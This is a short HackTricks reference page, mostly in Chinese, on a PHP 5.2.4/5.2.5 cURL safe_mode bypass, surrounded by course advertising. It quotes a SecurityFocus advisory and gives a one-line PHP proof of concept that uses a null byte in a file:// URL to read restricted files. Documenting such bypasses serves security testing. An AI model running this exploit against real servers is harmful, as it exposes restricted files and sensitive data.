disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

PHP 5.2.4和5.2.5 PHP cURL

来自http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

source: http://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4.

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

最后更新于